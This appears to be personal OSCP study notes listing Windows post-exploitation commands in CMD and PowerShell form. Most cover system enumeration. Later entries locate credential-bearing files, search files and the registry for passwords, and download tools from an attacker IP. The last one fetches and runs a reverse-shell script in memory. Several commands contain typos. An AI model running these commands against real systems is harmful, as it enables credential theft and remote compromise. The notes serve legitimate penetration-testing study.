# Commands * To understand Powershell working and commands formation do checkout {% content-ref url="powershell" %} [powershell](https://dhaneshsivasamy07.gitbook.io/oscp-2022/windows-post-exploitation/notes/powershell) {% endcontent-ref %} * Commands used in post exploitation for CMD and Powershell variants ``` C: command for cmd P: command for powershell ``` * System information ```bash C: systeminfo P: Get-ComputerInfo ``` * Grep ```bash C: findstr P: Select-String -Pattern "OS:" ``` * Piping ```bash | C: systeminfo | findstr "OS" P: cat test.txt | Select-String -Pattern "OS" ``` * User name ```bash C: whoami [or] echo %username% P: $env:UserName ``` * Machine name ```bash C: hostname P: $env:DomainName [or] $env:Computername ``` * Users ```bash C: net user [or] net user /domain P: Get-LocalUser ``` * Information about the user ```bash C: net user dnoscp P: Get-LocalUser dnoscp ``` * Groups ```bash C: net localgroup [or] net localgroup /domain P: Get-LocalGroup ``` * Get Group members ```bash C: net localgroup Administrators P: Get-LocalGroupMember Administrators ``` * Get the network adapters ```bash C: ipconfig [or] ipconfig /all P: Get-NetAdapter ``` * Routing Table information ```bash C: route print P: Get-NetRoute ``` * Open ports ```bash C: netstat -ano -p TCP [or] netstat -ano -p UDP P: Get-NetTCPConnection ``` * Scheduled Jobs ```bash C: schtasks P: Get-ScheduledTask ``` * Running Process ```bash C: tasklist /svc P: Get-Process ``` * Starting a service ```bash C: net start Themes P: Start-Process -FilePath "sort.exe" ``` * Installed Drivers ```bash C: drivequery P: Get-WindowsDriver -Online -All ``` * Last upated information ```bash C: wmic qfe get Caption, Description, InstalledOn, HotFixID P: (New-Object -com "Microsoft.Update.AutoUpdate"). Results | fl ``` * Juicy files location ```bash C:\sysprep.inf C:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml C:\Users\userName\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ``` * Find files ```bash C: dir /s /p /*.txt /*.xml P: Get-ChildIten -Path . -Include *.txt,*xml -Recurse -File -Force -ErrorAction 'SilentlyContinue' ``` * Search for a string in a file ```bash C: findstr /si "password" *.txt,*.xml P: Get-ChildItem -Recurse . -Filter *.txt,*.xml | Select-String "password" ``` * Serch registry for passwords ```bash reg query HKLM /f "password" /t REG_SZ /s reg query HKCU /f "password" /t REG_SZ /s ``` * Running Services ```bash C: sc query P: Get-Service [or] Get-Service | ? {$_.Status -eq "Running"} ``` * Information about the running processes ```bash C: sc query "Spooler" P: Get-Service "Spooler" ``` * Copy a file ```bash C: copy source_location destination P: Copy-Item source_location -Destination destination ``` * Move a file ```bash C: move source_location destination P: Move-Item source_location -Destination destination ``` * Download a file ```bash C: certutil -f -split -urlcache http://10.10.10.10/chisel.exe -outfile chisel.exe P: Invoke-WebRequest -Uri http://10.10.10.10/chisel.exe -OutFile chisel.exe P: (New-Object System.Net.Web.Client).DownloadFile("http://10.10.10.10/chisel.exe". "chisel.exe") ``` * Exeucte powershell scripts directly from the memory ```bash P: Invoke-Expression(Invoke-WebRequest -Uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -UseBasicParsing) # Can be aliased as iex(iwr -uri "http://10.10.10.10/PowerShellReverseTCP.ps1" -usebasicparsing) ```